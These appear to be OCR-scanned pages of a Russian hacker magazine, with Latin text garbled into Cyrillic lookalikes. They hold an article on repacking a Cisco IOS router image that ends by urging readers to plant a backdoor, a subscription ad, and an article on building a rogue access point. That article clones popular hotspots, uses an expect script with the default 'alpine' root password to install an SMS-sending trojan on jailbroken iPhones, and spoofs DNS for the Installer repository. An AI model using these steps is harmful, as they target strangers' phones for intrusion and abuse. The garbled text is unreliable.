- ргодгат ЬеасЗег соипД 1 

- зесДіоп АеасЗег епДгу зіге 0x2 8 

- зесДіоп АеасЗег соипД б 



Не углубляясь вописание(идабыне повторяться), отправляю тебя к 
спецификации. 

Так как весь процесс исследования я проводил в М5 ѴѴіпбоѵѵз, то при- 
шлось искать замену утилите геабеІТ из состава Ьіпибіз. Подходящим 
вариантом оказался шестнадцатеричный редактор НТ [ Ые.збпеІ: ). ко- 
торый умеет читать и модифицировать структуры данных исполняемых 
файлов ЕІ_Р. При попытке открыть подопытный образ с2600-епіЬа5ек9- 
ПП2.124-9.Т1 . Ь і п , НТ сразу меня обругал, что и привлекло мое внимание. 
Обратимся кеІТЬ. Структура данных, отвечающая за ЕІ_Р-заголовок, 



Что, в сумме, дает размер 52+32+6*40=324 или 0x144, то есть, в файле 
всего 6 секций (соответственно, 6 заголовков секций) и 1 заголовок про- 
граммы. Вероятнее всего, одна из секций предназначена для хранения 
архива с исполняемым образом 105. Эту секцию можно вычислить либо 
по размеру (логично, что ее размер должен быть максимальным), либо 
потипу секции. Заголовоктаблицы секций можно просмотреть, нажав 
<Р6> и выбрав еіі/зесбоп Ьеабегз, но для начала обратимся кописанию 
секции: 



выглядит так: 




ЦуресіеТ зДгисД 


{ 






Е1Т32_Шгсі 


з1г_пате ; 


ЦуресіеТ зЕгисД 


{ 


ЕІТ32_Шогсі 


з!і_Руре ; 


Е1Т_СЪаг 


е_іс!егЩ [ЕІ_ЫІБЕЕТ] ; 


ЕІТ32_Шогсі 


з!і_Т1адз ; 


ЕЮ2_На1Т 


е_Буре ; 


ЕІТ32_Асі(Тг 


з!і_а(ісіг ; 


Е1Т32_На1Т 


е_тасМпе; 


ЕІТ32_ОТТ 


з1г_оТТзеР | 


Е1Т32_МогсЗ 


е_ѵегзіоп; 


ЕІТ32_Ѵ7огсі 


з 1 г_зІ 2 е; 


ЕІТ32_Асісіг 


е_епРгу ; 


ЕІТ32_Ѵ7огсі 


з!г_1іпк; 


ЕІТ32_ОТТ 


е_рЬ.оТТ; 


ЕІТ32_Ѵ\Іогсі 


з1г_іпТо; 


ЕІТ32_ОТТ 


е_зТюТТ ; 


ЕІТ32_Шогсі 


з!і_а(ісіга1ідп; 


ЕІТ32_Шог<і 


е_Т1адз ; 


ЕІТ32_Шогсі 


з 1 і_епРзІ 2 е; 


ЕІТ32_На1Т 


е_еЬзІ 2 е; 


} Е1Т32_ЗМг; 





► обо 
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Редактор НТ 



Поле 5Ь_1уре и будет отвечать за искомый тип. 

К сожалению, здесь меня ждал облом, — большинство секций имело 
тип 5НТ_РР0СВІТ5, предназначенный для секций, значение которых 
определяется самой программой. Однако четвертая секция имела тип, 
отличный от предыдущих, и значение 0x00000007 (секция предназна- 
чена для каких-то программных заметок]. Первая (нулевая] секция 
также имеет отличный от предыдущих тип (5НТ_І\ІІЛ_І_]. Исходя из 
этого, ясно, что она пустая и ни с чем не ассоциирована. В итоге, при- 
ходится искать секцию с максимальным размером (поле зЬ_зІ 2 е]. Это 
— секция за номером пять, ее размер 0x1 070е7с или 1 7239676 байт. 
Вернемся к Ьех-виду (<Е6> — Ьех] и перейдем по смещению (поле 
збщоіізеі:) с помощью <Р5>. 

Что же мы здесь видим? Где наш архив, который должен начинаться с 
сигнатуры РК, а точнее, если следовать спецификации РК2ІР-формата 
( ркѵѵа ге.сот/боситепіз/сазезШсІіез/АРРМОТЕ.ТХТ ). — с 0x04034650 
в обратном порядке? Как ни странно, эта сигнатура обнаруживается 
на 22 байта позже. А если хорошо присмотреться, то отказывается, что 
сразу за значением ОхРЕЕОРАСЕ идет размер распакованного образа 
0х02АЕО904. Внимательно поискав в Сети, можно наткнуться на инфор- 
мацию из книги Сізсо ЫеЕл/огкз Наскіпд Ехрозеб издательства Мсбгаѵѵ 
НіІІ/ОзЬогпе. 

Наши русские парни Апбгеѵѵ А. Ѵіабітігоѵ, Копзіапбп V. Оаѵгііепко, 
Запіз N. Ѵігиііз апб Апбгеі А. Мікбаііоѵзку еще в 2006 году зани- 
мались разработкой бинарного патчинга 105 12. 3(6]. Им удалось 
выяснить, что после магического значения ОхРЕЕОРАСЕ идут 
последовательно ипсотргеззесі ітаде зі т.е, сотргеззеб ітаде 
зіге, сотргеззесі ітаде сбескзит, ипсотргеззеб ітаде сбескзит. 
Товарищам также стало известно, что алгоритм вычисления конт- 
рольной суммы представляет собой модифицированный алгоритм 
контрольной суммы в интернете. Ксчастью, нам не придется ничего 
вычислять — проверено на практике, что маршрутизатор сам ска- 
жет, какое значение должно иметь это поле, если, конечно, подсчи- 
танная контрольная сумма и записанная в соответствующем поле не 
совпадут: 

Еггог : сотргеззесі ітаде сйескзшп із іпсоггесб 

0хВ99Б8823 

Ехресбеб а сЬескзит оі 0 хЕ6Е69877 





Стираем іІазЬ 



Сигнатура ЕЕЕОЕАСЕ по искомому смещению 



секции (№5], содержащей архив с образом 105, загружаемым в память, — 
0х1070е7с или 1 7239676 (включая 20 байте ОхРЕЕОРАСЕ по 0х504В0304]. 
Размер новой секции, содержащей архив, — 0хЕВ9О38 или 16489784 
(включая те же 20 байт]. Разница между старым и новым значением 
составит ОхВ 71 58 — 74991 2. То есть, смещение четвертой секции, физи- 
чески расположенной в файле после пятой секции, требуется изменить с 
0x1075360 на 0хЕВЕ208! 

Старые значения после магической записи ОхРЕЕОРАСЕ: 

ипраскесі ітаде зІ 2 е: 0х02АЕБ904 45013252 
раскесі ітаде зіге: 0х01070Е66 17239654 (разница с разме- 
ром 5й секции - на 22 байта меньше) 
раскеб ітаде сЬескзит: 0хВ58ВЕ139 
шіраскеб ітаде скескзит: 0хА29Б4Е6Е 
затем идет сигнатура: 0х504В0304 

Новые значения после магической записи ОхРЕЕОРАСЕ: 

шіраскеб ітаде зізе: 0х02АЕБ904 (остался тот же) 
раскеб ітаде зіге: 0х00ЕВ9Б22 16489762 (разница с разме- 
ром 5й секции - на 22 байта меньше) 

раскеб ітаде скескзшп: нам неизвестна и можно заменить на 

что-нибудь приметное , типа 0x4 8000 000 

шіраскеб ітаде сЬескзит: 0хА29Б4Е6Е (остался тот же) 



*** Зузбет геееіѵеб а Зоібмаге іогсеб сгазк *** 
зідпа1= 0x17, собе= 0x5, соп1ех1= 0x80080510 
РС = 0x0, Ѵесбог = 0x0, ЗР = 0x0 

Н ПРАКТИКА (ИНТЕГРАЦИИ НОВОГО АРХИВА) 

Перейдем кактивным действиям. Для начала вырезаем из файла старую 
четвертую секцию, содержащую гі р-а рхи в, — за исключением 20 байт, 
начиная с магическогозначения ОхРЕЕОРАСЕ до сигнатуры т.\р (то есть, 
со смещения 0х44Е8посмещение0х1075360 + 0х44Е8]. Затем посмеще- 
нию 0х44Е8 вставляем новый архив. 

Соединим всю известную нам информацию воедино. Размер старой 



Новую контрольную сумму, как я уже говорил, сообщит сам маршрутиза- 
тор. 

После всех манипуляций конечный образ был получен, но его размер 
меня не впечатлил. По сравнению с изначальным размером 1 6,4 
МВ (17257364 Ьуіез] я получил всего лишь 1 5,7 МВ (16507472 Ьуіез]. 
Разница, которую я уже посчитал выше, составила 749912 байт. 
Конечно, это позволитзагрузить образ на КазЬ, но, скорее всего, 
придется применять опцию /по-зциееге-гезеп/е-зрасе. Когда при 
копировании маршрутизатор запросит повторное стирание Назб, 
подтверждать действие не нужно. Естественно, такая ситуация была 
бы только втом случае, если образ был бы сформирован правильно. Поэ- 
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Файл Правка Вид Избранное Сервис Справка 


Ф = ѵ 


оф 


-► 


X а 


Добавить Извлечь Тестировать 


Копировать 


Переместить 


Удалить Информация 
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- 



Имя Размер Сжатый Изменен Создан Открыт Атрибуты Зашифрован Комментарий СКС Метод Система 

^ |С260ШВІМІ 45 013 252 17 239 532 2006-08-30 15:55 - 09ВС620Е РеЯаІе РАТ 



Выделено объектов: 0 



Содержимое архива 



тому я не стал спешить и для загрузки образа зашел в режим готтоп по 
<СМ+Вгеак>. И — со своего компьютера загрузил образ по Шр напрямую 
в ВАМ: 

готтоп 1>С:Ё:Срс1п1с1 -г 

После загрузки маршрутизатор я сказал: 

ТЕТР НазЬ сору: Еггог, ітаде зіге (1650747 0) тізтаксЬез 
пеізіге (16507472). 

Оказалось, что при редактировании размера 5й секции я ошибся на 2 
байта (те самые 20 байте ОхРЕЕОРАСЕ + 2]. 

После второй попытки загрузки выяснилось, что контрольная сумма 
запакованного образа — 0хВ0257В0О: 

Еггог : сотргеззесі ітаде сЬескзшп із іпсоггеск 
0хВ99Б8823 

Ехрескесі а сЬескзит оі 0x48000000 

*** Зузкет гесеіѵесі а Зоікмаге іогсесі сгазЬ *** 
зідпа1= 0x17, сос!е= 0x5, сопкех1= 0x80080510 
РС = 0x0, Ѵеског = 0x0, ЗР = 0x0 

Корректируем соответствующее поле после ОхРЕЕОРАСЕ (загружаем 
файл в РІТ по <РЗ>, переходим по смещению с помощью <Р5> и редакти- 
руем по <Р4>, не забывая сохраняться по <Р2>]. Снова грузимся. 

готтоп 4>гезе1 -з 

Дальше все нормально, однако затем 105 вываливается и отказывается 
работать по причине недостатка памяти. 

Н НИКОГДА НЕ СДАВАЙСЯ 

Я не расстроился и решил взяться за другой образ — с2600- 
асІѵБеси гМ:ук9- гп 2 . 1 24-21 .Ьіп. После аналогичных манипуляций с байта- 
ми, даже при использовании 128-битного слова в 7^і р, размер составил 
15947076 (против изначальных 16635336], что позволило загрузить его во 
НазЬ . Помимо прочего, этот образ уже не ругался на недостаток памяти 
ВАМ и прекрасно чувствовал себя на этой платформе: 

гои1ег#зЬсж ѵегзіоп 

Сізсо 103 Зоіімаге , С2600 Зоіімаге (С2600- 
АБѴ5ЕСШІТУК9-М) , Ѵегзіоп 12.4(21) , ЕЕЬЕАЗЕ ЗОЕТМАКЕ 
(Ісі) 

<зкірес!> 

гои1ег#зЬом тетогу зиттагу 



Неасі Токаі (Ь) БзесІ(Ъ) Егее(Ь) Бомезк (Ъ) Ьагдезк (Ь) 
Ргосеззог 82А44240 20244772 8718640 11526132 10171028 
10098348 

І/О ЗСА3400 3525632 1650536 1875096 1875096 1875068 
<зкірес!> 

гои1ег#зЬсж НазЬ: 

Зузкет НазЬ. Ьігесіогу: 

Еііе БепдкЬ Ыате/зкакиз 

1 15947076 с2600-аЬѵзесигікук9-т2 . 124-21-зЬасІ-рк . Ып 
[15947140 Ьукез изеЬ, 830072 аѵаіІаЫе, 16777212 ЬоЬаІ] 
163 84К Ьукез оі ргосеззог Ъоагсі Зузкет ІІазЬ (КеаЬ/ 
ІДгіке) 

Остается еще одна небольшая проблема. Если запустить проверку: 

гои!ег#ѵегі1у НазЬ: с2600-аЬѵзесигі1ук9-т2 . 124-21- 
зЬаЬ-рк . Ып 

— маршрутизатор обругает нас, сообщив, что ЕтЬесИесІ ЬазЬ и 
Са Іси Іаіесі ЬазЬ не совпадают. Исправить это очень просто — 1 6 байт 
контрольной суммы находится в самом конце бинарного файла образа. 
Обнаружить это можно даже с помощью простого поиска: 

После исправления маршрутизатор сообщает, что контрольная сумма 
успешно подсчитана и совпадает: 

ЕтЪеЬЬеЬ НазЬ МБ5 : ЗББ2С659ІЕЕ4Е033425147БЕ4540Е9СБ 
СотриІеЬ НазЬ МБ5 : ЗББ2С6591ЕЕ4Е033425147БЕ4540Е9СБ 
ССО НазЬ МБ5 : 79020945ВБЕЕ2А354Е012С8303136360 

ЕтЪескЗесІ ЬазЬ ѵегііісаііоп зиссеззіиі . 

Еііе зузіет ЬазЪ. ѵегііісаііоп зиссеззіиі. 

Н ЛОГИЧЕСКОЕ ЗАКЛЮЧЕНИЕ 

Новый образ готов и правильно сформирован. Усвоив эту статью, ты 

ПОЛуЧИШЬ ОПЫТ: 

О по формату РК2ІР; 

2) по формату исполняемых файлов ЕЕЕ; 

3) по внутреннемуустройству образов Сізсо 105; 

4) по работе в режиме готтоп маршрутизатора. 

Крометого, готов задел для дальнейших извращений над маршрутизато- 
рами. Для общего развития можно поковырять распакованные образы в 
ЮА, изучить вирусы в *піх-1іке системах, чтобы проинфицировать образ 
своим бекдором, ну и собственно, написать бекдор. А мои изыскания здесь 
успешнозаканчиваются. Все вопросы, пожелания и, в особенности, идеи, 
мой дорогой друг, я готов получить по электронной почте. С радостью отвечу 
и помогу по мере сил. Удачи в бинарном патчинге... и нетолько.^с 
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Подписка на журнал «ХАКЕР+ОѴР» на 6 месяцев 
стоит 1200 руб. 



По всем вогтоосам 




ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 

2100 руб. (на 15% дешевле чем 
при покупке в розницу) 



Единая цена по всей России. Доставка за счет издателя, 
в том числе курьером по Москве в пределах МКАД 



ВНИМАНИЕ! 

ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 

При подписке на комплект журналов 

ЖЕЛЕЗО + ХАКЕР + ОШ 

- Один номер всего за 1 55 рублей (на 25% дешевле, чем в розницу) 

ЗА 12 МЕСЯЦЕВ ЗА 6 МЕСЯЦЕВ 



ВЫГОДА • ГАРАНТИЯ • СЕРВИС 

КАК ОФОРМИТЬ ЗАКАЗ 

1. Разборчиво заполните подписной купон и квитанцию, вырезав 
их из журнала, сделав ксерокопию или распечатав с сайта ѵѵѵѵѵѵ. 
діс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 
квитанции — любым из нижеперечисленных способов: 

• по электронной почте $иЬ$сгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка оформляется в день обработки купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов в 
редакцию по факсу или электронной почте; 

• в течение 20 рабочих дней после отправки подписных документов по 
почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в последнем 
случае предварительно отсканировав или сфотографировав документы. 
Подписка оформляется с номера, выходящего через один кален- 
дарный месяц после оплаты. Например, если вы производите оплату в , 
апреле, то журнал будете получать с июня. 



связанным с подпиской, звоните по бесплатным телефонам 8(495)780-88-29 (для москвичей) 
и 8(800)200-3-999 (для жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). Вопросы 
о подписке можно также направлять по адресу іпЬ@дІс.ги или прояснить на сайте ѵуѵуѵу.СИС.ш 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 



□ на 6 месяцев 

□ на 12 месяцев 



начиная с 



.200 г. 



і— I Доставлять журнал по почте 
* на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 



(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 



область/край 



город 



улица 



дом 



корпус 



квартира/офис 



телефон ( 



е-таіі 



сумма оплаты 



*в свободном поле укажи название фирмы 
и другую необходимую информацию 
*в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 



свободное поле 



Извещение 



Кассир 



Квитанция 



Кассир 



ИНН 



7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИ К 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г. 





Ф.И.О. 



Подпись плательщика 



ИНН 



7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г. 





Ф.И.О. 



Подпись плательщика 






» 



взлом 



Э02ЫР 

/ НТТР://ОХОО.КО / 




іРЬопе 

ТЕРМИНАТОР 



СОЗДАЕМ АВТОМАТИЧЕСКОЕ СРЕДСТВО АУДИТА АРРЬЕ ІРНОИЕ 



В мартовском номере, в статье «Яблочное пюре», я рассказал о самом попу- 
лярном и притязательном телефоне на рынке — Арріе іРНопе. Можно дол- 
го спорить на тему его функциональности, сравнивать с камнем или 
с ЛСД, восхищаться и глумиться, но все это я оставлю на твое личное усмот- 
рение. На себя же возьму обязательство продолжить рассказ о безопасности 
устройства. А безопасность іРЬопе, скажу я тебе, оставляет желать лучшего 



М Сперва разберемся, что же заставляет андеграунд двигаться в 
| оп ределенном направлении исследований. Если судить по количест- 
^ ву прикладных эксплоитов (офигеть какой показатель, сам знаю], то 
й ѴѴіп-системы гораздо болееуязвимы, чем все N іх вместе взятые. Глупо 
предполагать, что делотолько в кривизне кода от М іеговой. Весь секрет 
в популярности: чем больше пользователей пользуются софтом, тем 
больше интереса (материального и идейного] искать в нем ошибки и 
уязвимости. Какой резон в публикации невероятно сложной и красивой 
атаки на какой-нибудь Атоі МО-1 (это мобильный телефон, если что)? А 
вот в простой атаке на Арріе ІРЬопе пользы куда больше! Популярности 



одной модели айфона могут позавидовать целые сериителефонов. 
Сколько всего на территории нашей прекрасной страны ІРЬопе, не 
знаетникто, но оценку этой величины дать можно. На ленте за 26 января 
значилась цифра 120.000 проданных белых Зд. До этого времени, по 
оценкам экспертов, было еще 250.000 серыхтелефонов. В сумме полу- 
чаем где-то 370.000. За цифруя не ручаюсь, и, если окажется, что она в 
два раза выше, — неудивлюсь. Наши операторы обязалисьза два года 
продать около 3 млн. устройств, так что им еще есть куда стремиться... 

В одном отдельно взятом кафе в столице легко можно встретить 5-10 
айфонов за раз. Хотел бы ты получить возможность обрабатывать чужие 
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СИР 




СИР 



СИР 



ЭЛЕКТРИЧЕСКАЯ СХЕМА АДАПТЕРА ПИТАНИЯ 12 В 

ОТ АВТОМОБИЛЬНОГО ПРИКУРИВАТЕЛЯ С ПОДАВЛЕНИЕМ 

ШУМОВ 



телефоны в автоматическом режиме? Дальше я опишу процесс создания 
устройства для поиска и аудита яблочныхтелефонов. Мы скомбинируем 
принципы пассивного и активного сканирования, а также описанные в 
предыдущей статье атаки. Наштерминатор будетпытаться получитьдо- 
ступ ко всем айфонам в округе и запускать на нихтестовое приложение 
для отправки 5М5. Ну все, хватитобещаний, поехали! 

И ВЫБИРАЕМ ПЛАТФОРМУ 

Давай прикинем, каким основным требованиям должно удовлетворять 
автоматическое средство аудита мобильныхтелефонов? Прежде всего, 
конечно, мобильность, извиняюсьзатавтологию. Идея использовать 
обычный ноутбук приходит в голову сразу, однако, это не всегда удобно. 

Я предлагаю поступить по-хакерски и сделать іРЬопетерминатора из 
обычного беспроводного роутера или точки доступа. Такая платформа 
обладает рядом преимуществ по сравнению с ноутом: 

• Компактные размеры (меньше, чем даже 10 -дюймовые нетбуки) 

• Маленький вес (15 0 г!) 

• Низкое энергопотребление (питается от аккумулятора) 

• Штатный разъем для внешней антенны (попробуй найди в 
магазине РСМСІА беспроводную карту с разъемом внешней 
антенны) 

• Дешевизна (~2000р против -8000 руб. за самый дешевый 
нетбук) 

Крометого, в определенных местах человеке ноутом привлекает 
гораздо больше внимания, чем человеке рюкзачком или сумкой. Вместо 
штатного монитора контролироватьустройство мы будем через 55Н с 
телефона — таким образом, шансы прохожих разглядеть что-то инте- 
ресное натвоем экранеуменьшаются до нуля. Еслитебя коробит вопрос 
производительности, то смею заверить — процессора АРМ 
200 МГцхватитьдля наших нужд выше крыши. Нелишним будет 115В- 
порт— мы поместим туда флешку для ведения ядовитых логов, но если 
его нет, можно скидывать все на «админский»телефон или сервер в 
интернете. Я буду описывать процесс на примере Азиз ѴѴб-бООб, просто 
потому, что он валяется под рукой. Все будет абсолютно аналогично при 



использовании любого роутера из этого списка: Ыір ://ѵѵі кі . орепѵѵгі.огд/ 
СотріеіеТаЬіеОіНагбѵѵа ге . 

Если моих доводов в пользу выбора платформы недостаточно и желание 
повторить все нижеописанное на ноуте непреодолимо, — вперед! Весь 
используемый софт работает подлинухом и без труда заведется под твой 
любимый дистрибутив или другой нике. На всякий случай напомню: 
если возникнут какие-то вопросы, можешь задать их в моем блоге [ охсс 
). Только не забудь вытащитьжесткий диск и поставить ОС на флешку: 
при ходьбе и, тем более, беге, есть большой шансзаклинить даже самые 
дорогие диски. С платформой определились, едем дальше! 

Н СОБЕРИ САМ. СОЗДАЕМ СВОЮ ПРОШИВКУ 

Для моего роутера существует несколько дистрибутивов линукса. Это 
— орепѵѵгі, бб-ѵѵгі и другие, менее известные. Я решил использовать 
орепѵѵгі исключительно по этическим соображениям, и ты можешь 
выбрать что угодно, или даже воспользоваться оригинальным дистри- 
бутивом от производителя, их часто выкладывают под лицензией 6Р6. 

В общем, необходимое условие одно — наличие іооісбаіп.т.е. средств 
кросс-компиляции, с помощью которых мы соберем и поместим в 
прошивку нестандартные утилиты. Нам всего-то потребуются: ехресі, 
ззб сііепі, ззбб, Ніір-сервер, сіпз-сервер. Буду рассказывать на примере 
орепѵѵіі, так что выкачиваем сборку под свою модель, в моем случае это: 
Ьіір://боуѵпІоабз.орепѵѵгі.огд/катіка2е/8.09/Ьгспп-2.4/орепѵѵгі-Ьгспп- 
із.ігх . Вышла она 1 5 февраля 2009 года, — самый свежак. 
Перед прошивкой переводим устройство в Ра і Іи ге Мобе. Для этого 
отключаем питание, зажимаем кнопку Резеі и подключаем питание. 
Держим Резеі, пока индикатор питания не подмигнет нам, затем отпус- 
каем кнопку. Процедура входа в Еаііиге Мобе для разных роутеров может 
отличаться, но подробная процедура установки всегда будет описана 
вѴѴІКІ орепѵѵгідля каждой модели. Ссылка на инструкцию находит- 
ся в последней колонке таблицы поддерживаемыхустройств. Далее 
подключаем патч-корд кустройству и проверяем, чтоу нас вышло: ріпд 
192.168.1.1. Если все хорошо и устройство отвечает, переходим кзаливке 
прошивки. Потребуется ііір-клиент, его можно взять здесь: 

• ЬіірУ/ѵѵѵѵѵѵ.ііір-зегѵег.сот/ііір-боѵѵпІоаб.ИіппІ — для ѴѴіпбоѵѵз; 

• ЬіірУ/раскадез.беЬіап.от/ т — БеЬіап зіаЫе. 
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АзизѴѴЕ-бООО Оеіихе собственной персоной 





> Ііпкз 



• орепѵѵгкогд — 

дистрибутив ОС 
Ііпих для точек 
доступа. 

• сМ-ѵѵгЕсопп — дру- 
гой вариант дистри- 
бутива ОС Ііпих для 
точекдоступа. 

• сосіе.доодіе. 
сот/р/ѵѵіпсЬаіп — 

средства разработ- 
ки для іРЬопе под 
ѴѴіпбоѵѵз. 



После установки заливаем прошивку на устройство: 

бббр 192.168.1.1 
СІСр> Ыпагу 
СІСр> бгасе 

б1бр> риб орепшгб-Ьгст-2 . 4-здиазМз . бгх 

Ждем, пока индикатор питания перестанет моргать 
(завершится процесс записи в РОМ). Воттак, просто и без 
приключений, мы подготовили платформу для дальнейших 
изысканий. Теперь перейдем непосредственно кнастройке. 
Выполняем команды: 

#~бе1пеб 192.168.1.1 
#~раззѵлі //устанавливаем пароль 
#~ехіб //отключаемся 

#~ззй гооб@192 . 168 .1.1 //первый раз эта про- 
цедура займет около минуты или двух — нетороп- 
ливое устройство создает ключевые пары. Если 
время ожидания 88Н-клиента истечет — повтори 
попытку подключения через пару минут 
#~іркд ирбабе //обновляем базу пакетов 



н иях !) . Для максимального эффекта предварительно 
просканируй все сети, действующие в том районе, где 
будешь производить испытания, и выдели наиболее 
популярные точки доступа. Затем поставь своему уст- 
ройству МАО и 551 0 , каку самого популярного хот- спота. 
Если ты окажешься ближе к пользователю, уровень 
сигнала от тебя будет выше, и ты получишь клиентов, 
привычно подключающихся кзнакомой сети. Простей- 
ший конфиг беспроводного интерфейса /еіс/сопбд/ 
ѵѵігеіезз выглядиттак: 

сопбід тлібі-беѵісе члІО 

орбіоп буре Ьгоабсот 
орбіоп сйаппеі 5 
орбіоп бізаЫеб О 
сопбід мібі-ібасе 

орбіоп беѵісе члІО 

орбіоп пебѵтогк Іап 

орбіоп тобе ар 

орбіоп ззіб Ргее_Іпбегпеб 

орбіоп Мббеп О 

орбіоп епсгурбіоп попе 



• — мой 

блог. Пишу по мере 
желания. Жду ком- 
ментариев, отвечу 
на вопросы. 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представле- 
на исключительно 
с целью ознакомле- 
ния! Ни автор, 
ни редакция за твои 
действия ответст- 
венности не несут! 



Возможно, перед последней командой придется еще на- 
строить подключение к интернету. Настройка интерфейсов 
происходит через Мс/сопЕд/пебл/огк. Если надо настроить 
РРРоЕ, создай в конфиге такое правило: 



сопбід іпбегбасе тлап 
орбіоп ібпате 
орбіоп ргобо 
орбіоп изегпаше 
орбіоп раззѵтогб 



паз О 
рррое 
"изегпаше " 
"раззтлгогб" 



На этом базовая установка ОС закончена. Дистрибутив уже 
включает в себя ОНСР-сервер, 55Н -сервер и 55Н- клиент. 
Дальнейшая настройка зависит оттипа атаки. 

Н ДЕЛАЙ РАЗ. ВКУСНАЯ ТОЧКА ДОСТУПА 

Теперь основная задача — заставить пользователя 
іРЬопе подключиться кнашей точке доступа. Мы долж- 
ны сделать ее наиболее привлекательной, сулящей 
неслыханную халяву и т.д. Первое, что приходит на ум 
— поставить 551 0, который точно привлечет внимание 
любого пользователя. Например, взять существующие 
имена бесплатных ѴѴіЕі -сетей. Для правдоподобности 
можно работать в режиме моста с настоящей точкой 
доступа, подключенной к интернету. Тогда пользователь 
будет иметь полноценный выход в глобальную Сеть, 
параллельно с этим попадаясь на все наши дальнейшие 
уловки с О N5 (я же не зря перечислил его в требова- 



Последний штрих — настройка ОНСР-сервера. Мы же 
должны создать для клиентов максимально комфортные 
условия работы в нашей сети :]. 

сопбід бйср 

орбіоп іпбегбасе Іап 

орбіоп збагб 2 //первый выданный 

ІР-адрес , в нашем случае будет 10.0.0.2 

орбіоп Іітіб 100 //сколько всего 

адресов выдавать 

орбіоп Іеазебіте Ій //время аренды 

адреса, надо выбрать в соответствии с динами- 

кой перемещения терминатора и клиентов 
сопбід бйср 

орбіоп іпбегбасе члап 

орбіоп ідпоге 1 

Если возникнут вопросы по поводу синтаксиса, обращай- 
ся кофициальной документации ЫірѴ/ѵѵікі.орепѵѵгЕога/ 
ОрепѴУгШосз/КатікагеСопЕдигаЦоп [в журнале приводить 
все возможные варианты настроексмысла нет). 

Н ДЕЛАЙ ДВА. ПОДБОР ПАРОЛЕЙ 55Н 

Самая простая и действенная на текущий момент атака на 
іРЬопе — пользуемся паролем по умолчанию, установлен- 
ным практически на все джеил брей кнутые телефоны 55Н0. 
Для начала, с помощью ІооІсЬа іп оторепѵѵгі собираем 
из исходников утилиту ехресЕ Если есть флешка, можно 
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Динамо-машина для зарядки ноутбука. Крути педали, пока не дали... 



поставить компилятор на сам роутер. Устанавливаем все 
необходимое: 

іркд іпзкаіі ЬиіІсІгооС 

іркд іпзкаіі таке 

іркд іпзкаіі ксі 

іркд іпзкаіі зсропіу 

іркд іпзкаіі орепззк-сііепк 

Сразу отредактируем /еіс/55Ь/55Ь_сопіід , добавив 
строчку «ЗітісЖозЖеуСЬескіпд по», чтобы 53Н-клиент 
не выдавал сообщение о принятии новых сессионных 
ключей для каждой жертвы. Затем скачиваем исход- 
ники ехресі: отсюда: ШрУ/ехресЕтзЦдоу/ехресШаг.дг . 
Распаковываем и собираем, какобычно: ./сопйдиге, 
таке, таке іпзіаіі. Может потребоваться установить 
переменную окружения: «зеіепѵ ТСІ__І_ІВРАРУ /изг/ 
ЬіпАс18.4.1 9/и Ь гагу». Теперь напишем скрипт, который 
будет пытаться подключиться ктелефону с дефолтной 
связкой логин-пароль. Получится что-нибудь наподо- 
бие ЭТОГО: 

# 1 /изг/Ьіп/ехреск 

зраѵт зср /штег/ірТіопе-кгоз ап гооСѲІО .0.0.2:/ 

изг/зЪіп/зузІодсІ 

ехресР аззѵгогсі {зепб а1ріпе\г} 

зраѵт ззЬ гооСѲІО .0.0.2 

ехресР аззѵгогсі {зепсі а1ріпе\г} 

зепсі "Ісіісі -3 /изг/зЬіп/зуз1одсі\г" 

зепсі "ехіб\г" 

ехресб еоі 

В случаеуспеха демон системных логов на захваченном 
телефоне заменится нашей программой і р Ь о п е - і го] а п , ко- 
торая будет выполняться при каждом рестарте системы. Что 
это будетза программа, мы рассмотрим ниже. Предлагаю в 
качестве самостоятельного упражнения связать логи ббср- 
сервера с выполнением этого скрипта так, чтобы атака 
осуществлялась на каждый новый выданный ІР. Можешь 
также установить птар и перед запуском проверять, что 
подцепился именно іРЬопе. 



Делается это командой птар -02 1 0.0.0. X. Стоит отме- 
тить, что сканирование птар’ом занимает приличное 
время, поэтому куда выгоднее просто пытаться атаковать 
сразу после подключения клиента. Тут уж решай сам. 

г ДЕЛАЙ ТРИ. ЛОЖНЫЙ РЕПОЗИТОРИЙ ІЫЗТАІЛЕК 

Эта атака была описана в моей предыдущей статье. Если 
вкратце, — суть заключается в подмене 0145-адреса 
репозитория менеджера пакетов Іпзіаііег. Менеджер уста- 
навливается на все джеилбрейкнутыетелефоны, коих, по 
некоторым оценкам, > 50% среди всех іРЬопе в нашей стра- 
не. Вы глядит это та к: пользователь подключается к нашему 
терминатору, открывает Іпзіаііеги устанавливаетобновле- 
ние самого менеджера пакетов. Но вместе с оригинальной 
программой нателефон заливается любая другая. 
Приступим к настройке. Устанавливаем 0І\І5-сервер: 

#~іркд іпзкаіі шагасіпз 

Меняем настоящий ІР сервера с репозиторием і.гірбеѵ.сот 
на наш. Для этого редактируем Мс/тагагс и /еіс/тагапбз/ 
гірбеѵ.сот: 

/ебс/тагагс : 

ірѵ4_Ьіп<і_а(і(ігеззез = "127.0.0.1, 10.0.0.1" 
сіігооб_с1іг = " /еРс /шагасіпз " //место, где будут 
лежать конфиги зон, можно выбрать, например, 
точку монтирования флешки... 

гесигзіѵе_ас1 = "127.0.0.1/8, 10.0.0.0/24" // 
